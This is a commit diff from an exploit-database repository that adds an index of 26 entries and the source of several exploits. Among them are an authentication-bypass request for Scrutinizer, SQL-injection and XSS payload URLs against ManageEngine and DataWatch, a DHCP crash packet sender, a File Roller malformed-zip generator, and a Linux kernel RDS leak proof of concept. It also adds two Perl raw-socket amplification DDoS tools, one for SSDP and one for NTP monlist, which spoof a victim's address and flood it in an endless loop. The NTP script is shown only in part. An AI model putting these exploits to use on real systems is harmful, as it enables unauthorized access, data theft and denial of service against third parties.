DB: 2015-07-11

26 new exploits
This commit is contained in:
Offensive Security 2015-07-11 05:03:28 +00:00
parent c1528e8ee0
commit e8f22fe4b6
27 changed files with 1135 additions and 0 deletions

View file

@ -33679,6 +33679,7 @@ id,file,description,date,author,platform,type,port
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
37293,platforms/linux/local/37293.txt,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shadow File)",2015-06-16,rebel,linux,local,0
37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900
37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0
37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure Vulnerability",2012-05-28,L3b-r1'z,php,webapps,0
37331,platforms/php/webapps/37331.py,"WHMCS 'boleto_bb.php' SQL Injection Vulnerability",2012-05-29,dex,php,webapps,0
@ -33839,6 +33840,7 @@ id,file,description,date,author,platform,type,port
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
37534,platforms/php/webapps/37534.txt,"WordPress Easy2Map Plugin 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80
37535,platforms/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - SEH Buffer Overflow",2015-07-08,Vulnerability-Lab,windows,local,0
@ -33869,6 +33871,7 @@ id,file,description,date,author,platform,type,port
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
37529,platforms/php/webapps/37529.txt,"WordPress MDC YouTube Downloader Plugin 2.1.0 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
@ -33877,3 +33880,26 @@ id,file,description,date,author,platform,type,port
37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3_ 1.8.2_ 1.9.0 - Stored XSS Vulnerability",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,metasploit,multiple,remote,0
37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
37539,platforms/php/webapps/37539.txt,"REDAXO 'subpage' Parameter Cross Site Scripting Vulnerability",2012-07-25,"High-Tech Bridge SA",php,webapps,0
37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component 'profession' Parameter SQL Injection Vulnerability",2012-07-25,"Daniel Barragan",php,webapps,0
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b 'anket.php' SQL Injection Vulnerability",2012-07-25,Socket_0x03,php,webapps,0
37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow Vulnerability",2012-07-25,coolkaveh,windows,remote,0
37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x 'rds_recvmsg()' Function Local Information Disclosure Vulnerability",2012-07-26,"Jay Fenlason",linux,local,0
37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 'redirect' Parameter URI Redirection Vulnerability",2012-07-29,"Aung Khant",php,webapps,0
37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0
37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 Arbitrary File Upload Vulnerability",2012-07-30,"Mario Ceballos",php,webapps,0
37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass Vulnerability",2012-07-30,"Mario Ceballos",cgi,webapps,0
37550,platforms/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps,0
37551,platforms/php/webapps/37551.txt,"phpBB Multiple SQL Injection Vulnerabilities",2012-07-28,HauntIT,php,webapps,0
37552,platforms/php/webapps/37552.txt,"JW Player 'playerready' Parameter Cross Site Scripting Vulnerability",2012-07-29,MustLive,php,webapps,0
37553,platforms/php/webapps/37553.txt,"eNdonesia 'cid' Parameter SQL Injection Vulnerability",2012-07-29,Crim3R,php,webapps,0
37554,platforms/php/webapps/37554.txt,"Limny 'index.php' Multiple SQL Injection Vulnerabilities",2012-07-31,L0n3ly-H34rT,php,webapps,0
37555,platforms/java/webapps/37555.txt,"ManageEngine Applications Manager Multiple SQL Injection Vulnerabilities",2012-08-01,"Ibrahim El-Sayed",java,webapps,0
37556,platforms/php/webapps/37556.txt,"Distimo Monitor Multiple Cross Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0
37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-08-01,"Ibrahim El-Sayed",java,webapps,0
37558,platforms/windows/dos/37558.txt,"Notepad++ 6.7.3 - Crash PoC",2015-07-10,"Rahul Pratap Singh",windows,dos,0
37559,platforms/php/webapps/37559.txt,"Wordpress CP Image Store with Slideshow Plugin 1.0.5 Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
37560,platforms/php/webapps/37560.txt,"Wordpress CP Multi View Event Calendar Plugin 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0
37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123

Can't render this file because it is too large.

30
platforms/cgi/webapps/37549.txt Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/54727/info
Scrutinizer is prone to an authentication-bypass vulnerability.
Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: 10.70.70.212
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{"new_user_id":"2"}

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/54756/info
ManageEngine Applications Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
ManageEngine Applications Manager 10.0 is vulnerable; other versions may also be affected.
http://www.example.com/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+WHERE+table_schema=database()--%20-
http://www.example.com/mobile/Search.do?method=mobileSearch&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search

View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/54759/info
ManageEngine Applications Manager is prone to multiple SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ManageEngine Applications Manager 10.0 is vulnerable; prior versions may also be affected.
http://www.example.com/MyPage.do?method=viewDashBoard&forpage=1&addNewTab=true&selectedpageid=10000017+AND+1=1--%20-[BLIND SQL-INJECTION]
http://www.example.com/jsp/RCA.jsp?resourceid=10000624&attributeid=1900&alertconfigurl=%2FshowActionProfiles.do%3Fmethod%3DgetResourceProfiles%26admin%3Dtrue%26all%3Dtrue%26resourceid%3D-10000624'+AND+substring(version(),1)=4
[BLIND SQL-INJECTION]&Sat%20Jun%2023%202012%2000:47:25%20GMT+0200%20(EET)
http://www.example.com/showCustom.do?resourcename=null&type=EC2Instance&original_type=EC2Instance&name=&moname=i-3a96b773&tabId=1&baseid=10000015&resourceid=10000744&monitorname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&method=showDataforConfs
http://www.example.com/MyPage.do?method=viewDashBoard&forpage=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&addNewTab=true&selectedpageid=10000014
http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101&redirectto=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://www.example.com/showresource.do?resourceid=10000189&type=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&moname=DNS+monitor&method=showdetails&resourcename=DNS+monitor&viewType=showResourceTypes
http://www.example.com/jsp/ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C&redirectto=/common/serverinfo.do
http://www.example.com/ProcessTemplates.do?method=createProcessTemplate&templatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C

11
platforms/jsp/webapps/37550.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/54733/info
DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities.
Successful exploits will allow an attacker to manipulate the XPath query logic to carry out unauthorized actions on the XML documents of the application. It will also allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
DataWatch Monarch Business Intelligence 5.1 is vulnerable; other versions may also be affected.
http://www.example.com/ESAdmin/jsp/tabview.jsp?mode=add</script><script>alert(1)</script>&type=2&renew=1&pageid=PAGE_MPROCESS
http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp

82
platforms/linux/dos/37538.py Executable file
View file

@ -0,0 +1,82 @@
source: http://www.securityfocus.com/bid/54665/info
ISC DHCP is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition.
#!/usr/bin/python
'''
SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of
service(infinite loop and CPU consumption/chew) via zero'ed client name length
http://www.k1p0d.com
'''
import socket
import getopt
from sys import argv
def main():
args = argv[1:]
try:
args, useless = getopt.getopt(args, 'p:h:')
args = dict(args)
args['-p']
args['-h']
except:
usage(argv[0])
exit(-1)
dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x22\x5f\xae'
'\xa7\xdf\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x63\x82\x53\x63'
'\x35\x01\x03\x32\x04\x0a\x00\x00'
'\x01\x0c\x00'
'\x37\x0d\x01\x1c\x02\x03\x0f'
'\x06\x77\x0c\x2c\x2f\x1a\x79\x2a'
'\xff\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00')
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((args['-h'], int(args['-p'])))
sock.sendall(dhcp_req_packet)
print 'Packet sent'
sock.close()
def usage(pyname):
print '''
Usage: %s -h <host> -p <port>
''' % pyname
if __name__ == "__main__":
main()

28
platforms/linux/dos/37546.pl Executable file
View file

@ -0,0 +1,28 @@
#!/usr/bin/perl
#
# Title: File Roller - DoS PoC
# Date: 08/07/2015
# Author: Arsyntex
# Homepage: https://wiki.gnome.org/Apps/FileRoller
# Version: v3.4.1
# Tested on: Linux lab 3.2.0-85-generic-pae #122-Ubuntu i686 i386 GNU/Linux
# -------------------------------------------------------------------------
# Create a zip file with a folder inside named: #
#
# Run: file-roller --extract-here test.zip
#
# Result: endless call's of lstat64() (50 % CPU usage) (Freeze app)
#
$zip = "\x50\x4b\x03\x04\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x23\x2f" .
"\x50\x4b\x01\x02\x3f\x03\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x10\x80\xfd\x41\x00\x00\x00\x00\x23\x2f" .
"\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x30\x00\x00\x00" .
"\x20\x00\x00\x00\x00\x00";
open FILE, ">poc.zip" or die("Can't open poc.zip\n") ;
binmode(FILE) ;
print FILE $zip ;
close FILE ;

150
platforms/linux/local/37543.c Executable file
View file

@ -0,0 +1,150 @@
source: http://www.securityfocus.com/bid/54702/info
The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
/***************** rds_client.c ********************/
int main(void)
{
int sock_fd;
struct sockaddr_in serverAddr;
struct sockaddr_in toAddr;
char recvBuffer[128] = "data from client";
struct msghdr msg;
struct iovec iov;
sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
if (sock_fd < 0) {
perror("create socket error\n");
exit(1);
}
memset(&serverAddr, 0, sizeof(serverAddr));
serverAddr.sin_family = AF_INET;
serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
serverAddr.sin_port = htons(4001);
if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
perror("bind() error\n");
close(sock_fd);
exit(1);
}
memset(&toAddr, 0, sizeof(toAddr));
toAddr.sin_family = AF_INET;
toAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
toAddr.sin_port = htons(4000);
msg.msg_name = &toAddr;
msg.msg_namelen = sizeof(toAddr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_iov->iov_base = recvBuffer;
msg.msg_iov->iov_len = strlen(recvBuffer) + 1;
msg.msg_control = 0;
msg.msg_controllen = 0;
msg.msg_flags = 0;
if (sendmsg(sock_fd, &msg, 0) == -1) {
perror("sendto() error\n");
close(sock_fd);
exit(1);
}
printf("client send data:%s\n", recvBuffer);
memset(recvBuffer, '\0', 128);
msg.msg_name = &toAddr;
msg.msg_namelen = sizeof(toAddr);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_iov->iov_base = recvBuffer;
msg.msg_iov->iov_len = 128;
msg.msg_control = 0;
msg.msg_controllen = 0;
msg.msg_flags = 0;
if (recvmsg(sock_fd, &msg, 0) == -1) {
perror("recvmsg() error\n");
close(sock_fd);
exit(1);
}
printf("receive data from server:%s\n", recvBuffer);
close(sock_fd);
return 0;
}
/***************** rds_server.c ********************/
int main(void)
{
struct sockaddr_in fromAddr;
int sock_fd;
struct sockaddr_in serverAddr;
unsigned int addrLen;
char recvBuffer[128];
struct msghdr msg;
struct iovec iov;
sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
if(sock_fd < 0) {
perror("create socket error\n");
exit(0);
}
memset(&serverAddr, 0, sizeof(serverAddr));
serverAddr.sin_family = AF_INET;
serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
serverAddr.sin_port = htons(4000);
if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
perror("bind error\n");
close(sock_fd);
exit(1);
}
printf("server is waiting to receive data...\n");
msg.msg_name = &fromAddr;
/*
* I add 16 to sizeof(fromAddr), ie 32,
* and pay attention to the definition of fromAddr,
* recvmsg() will overwrite sock_fd,
* since kernel will copy 32 bytes to userspace.
*
* If you just use sizeof(fromAddr), it works fine.
* */
msg.msg_namelen = sizeof(fromAddr) + 16;
/* msg.msg_namelen = sizeof(fromAddr); */
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_iov->iov_base = recvBuffer;
msg.msg_iov->iov_len = 128;
msg.msg_control = 0;
msg.msg_controllen = 0;
msg.msg_flags = 0;
while (1) {
printf("old socket fd=%d\n", sock_fd);
if (recvmsg(sock_fd, &msg, 0) == -1) {
perror("recvmsg() error\n");
close(sock_fd);
exit(1);
}
printf("server received data from client:%s\n", recvBuffer);
printf("msg.msg_namelen=%d\n", msg.msg_namelen);
printf("new socket fd=%d\n", sock_fd);
strcat(recvBuffer, "--data from server");
if (sendmsg(sock_fd, &msg, 0) == -1) {
perror("sendmsg()\n");
close(sock_fd);
exit(1);
}
}
close(sock_fd);
return 0;
}

134
platforms/multiple/dos/37561.pl Executable file
View file

@ -0,0 +1,134 @@
#!/usr/bin/perl
#
# upnpd M-SEARCH ssdp:discover reflection
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is HTTP
# like protocol and work with NOTIFY and M-SEARCH
# methods.
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# Wireshark:
# udp.port eq 1900 || frame contains "HTTP/1.1 200 OK"
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
use Socket;
if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}
my $ssdp = (gethostbyname($ARGV[0]))[4]; # IP Address Source (32 bits)
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
print "[ upnpd M-SEARCH ssdp:discover reflection ]\n";
if (!defined $ssdp || !defined $victim) {
print "[ Usage: $0 <upnpd> <victim>\n";
print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
exit;
}
print "[ Sending SSDP packets: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();
# Main program
sub main {
my $packet;
$packet = iphdr();
$packet .= udphdr();
$packet .= payload();
# b000000m...
send_packet($packet);
}
# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)
# IP Packet construction
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$victim, $ssdp
);
return $iphdr;
}
# UDP header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port, $udp_dst_port,
$udp_len, $udp_checksum
);
return $udphdr;
}
# SSDP HTTP like (Layer 7)
sub payload {
my $data;
$data .= "M-SEARCH * HTTP\/1.1\r\n";
# $data .= "HOST:239.255.255.250:1900\r\n"; # Multicast address
$data .= "ST:upnp:rootdevice\r\n"; # Search target, search for root devices only
$data .= "MAN:\"ssdp:discover\"\r\n";
# $data .= "MX:3\r\n\r\n"; # Seconds to delay response
my $payload = pack('a' . length($data), $data);
return $payload;
}
sub send_packet {
while(1){
select(undef, undef, undef, 0.10); # Sleeping 100 milliseconds
send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ssdp)) or die $!;
}
}

195
platforms/multiple/dos/37562.pl Executable file
View file

@ -0,0 +1,195 @@
#!/usr/bin/perl
#
# ntp MON_GETLIST query amplification ddos
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# A Network Time Protocol (NTP) Amplification
# attack is an emerging form of Distributed
# Denial of Service (DDoS) that relies on the
# use of publically accessible NTP servers to
# overwhelm a victim system with UDP traffic.
# The NTP service supports a monitoring service
# that allows administrators to query the server
# for traffic counts of connected clients. This
# information is provided via the “monlist”
# command. The basic attack technique consists
# of an attacker sending a "get monlist" request
# to a vulnerable NTP server, with the source
# address spoofed to be the victims address.
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
use Socket;
if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}
my $ntpd = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
print "[ ntpd MON_GETLIST query amplification ]\n";
if (!defined $ntpd || !defined $victim) {
print "[ Usg: $0 <ntp server> <victim>\n";
print "[ <todor.donev\@gmail.com> Todor Donev ]\n";
exit;
}
print "[ Sending NTP packets: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();
# Main program
sub main {
my $packet;
$packet = iphdr();
$packet .= udphdr();
$packet .= ntphdr();
# b000000m...
send_packet($packet);
}
# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)
# IP Packet
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos,
$ip_total_len, $ip_frag_id,
$ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$victim, $ntpd
);
return $iphdr;
}
# UDP Header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = 123; # UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(ntphdr()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port,
$udp_dst_port,
$udp_len,
$udp_checksum
);
return $udphdr;
}
# NTP Header (Layer 7)
sub ntphdr {
my $rm_vn_mode = 0x27;
# Response bit to 0, More bit to 0, Version field to 2, Mode field to 7
#
# A mode 7 packet is used exchanging data between an NTP server
# and a client for purposes other than time synchronization, e.g.
# monitoring, statistics gathering and configuration. A mode 7
# packet has the following format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |R|M| VN | Mode|A| Sequence | Implementation| Req Code |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Err | Number of data items | MBZ | Size of data item |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | Data (Minimum 0 octets, maximum 500 octets) |
# | |
# | [...] |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Encryption Keyid (when A bit set) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | Message Authentication Code (when A bit set) |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# where the fields are (note that the client sends requests, the server
# responses):
# Response Bit: This packet is a response (if clear, packet is a request).
# More Bit: Set for all packets but the last in a response which
# requires more than one packet.
# Version Number: 2 for current version
# Mode: Always 7
my $auth = 0x00; # If set, this packet is authenticated.
my $implementation = 0x03; # Iimplementation: 0x00 (UNIV), 0x02 (XNTPD_OLD), 0x03 (XNTPD)
# The number of the implementation this request code
# is defined by. An implementation number of zero is used
# for requst codes/data formats which all implementations
# agree on. Implementation number 255 is reserved (for
# extensions, in case we run out).
